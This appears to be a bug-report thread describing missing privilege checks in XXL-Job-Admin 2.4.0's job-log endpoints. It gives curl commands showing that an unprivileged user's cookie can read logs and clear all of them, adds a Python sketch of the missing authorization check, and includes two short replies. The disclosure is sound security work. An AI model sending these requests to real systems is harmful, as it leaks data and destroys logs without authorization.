Environment
MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)
Vulnerability Information
It was found that direct queries to xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailPage do not validate user privilege and induce a risk of sensitive information leakage and loss.
Steps to reproduce the behavior
Step 1: Create a normal user without any privilege inside the web console as below
Step 2: Retrieve the cookie for the user
Step 3: Run the following command for testing log query:
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/logDetailCat" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'logId=9&fromLineNum=1'
It shows a successful log query and returns a 200 status.
Step 4: Run the following command for log clearing:
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/clearLog" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'jobGroup=0&jobId=0&type=9'
It will return a 200 status.
Step 5: Show the log in the console. It will show that all logs were cleared successfully by the normal user.
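As an added illustration (not xxl-job's own code), the kind of per-request authorization check that the two endpoints above are reported to lack: the session role, the job groups granted to the user, the log-id-to-group index and the policy itself are all constructed assumptions for this example.

```python
from dataclasses import dataclass, field
from urllib.parse import parse_qs

# Constructed session model: an admin flag plus the job groups a
# non-admin user has been granted. Not xxl-job's real session object.
@dataclass
class Session:
    username: str
    is_admin: bool
    job_groups: frozenset = field(default_factory=frozenset)

# Constructed index: log id -> job group that produced it. A real
# deployment would resolve this from the job log table.
LOG_INDEX = {9: 2, 10: 3}

def parse_form(body: str) -> dict:
    """Parse an x-www-form-urlencoded body, keeping only integer fields."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {k: int(v) for k, v in fields.items() if v.lstrip("-").isdigit()}

def authorize_joblog(session: Session, endpoint: str, body: str) -> tuple:
    """Decide whether a session may call a /joblog endpoint with this body.

    Modelled policy (an assumption for this example):
      - admins may do anything;
      - logDetailCat: the requested log must belong to a granted group;
      - clearLog: the requested jobGroup must be a granted group;
      - a value of 0 (the wildcard used in the report) is admin-only.
    Returns (allowed, reason).
    """
    if session.is_admin:
        return True, "admin role"
    params = parse_form(body)
    if endpoint == "logDetailCat":
        log_id = params.get("logId", 0)
        group = LOG_INDEX.get(log_id)
        if log_id == 0 or group is None:
            return False, f"logId {log_id} is a wildcard or unknown"
        if group in session.job_groups:
            return True, f"log {log_id} is in granted group {group}"
        return False, f"log {log_id} is in group {group}, not granted"
    if endpoint == "clearLog":
        group = params.get("jobGroup", 0)
        if group == 0:
            return False, "wildcard jobGroup=0 requires admin role"
        if group in session.job_groups:
            return True, f"clearing granted group {group}"
        return False, f"group {group} not granted"
    return False, f"unknown endpoint {endpoint}"
```

With a non-admin session granted only group 2, the report's `jobGroup=0&jobId=0&type=9` clear request is refused while `logId=9&fromLineNum=1` (a group-2 log in the constructed index) is allowed.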
2 answers
aij0ehis 1#
Create an unprivileged user and get its cookie, which I don't think is easy for attackers.
yfwxisqw 2#
Agree. The assumption of the attack is that you gained an unprivileged account.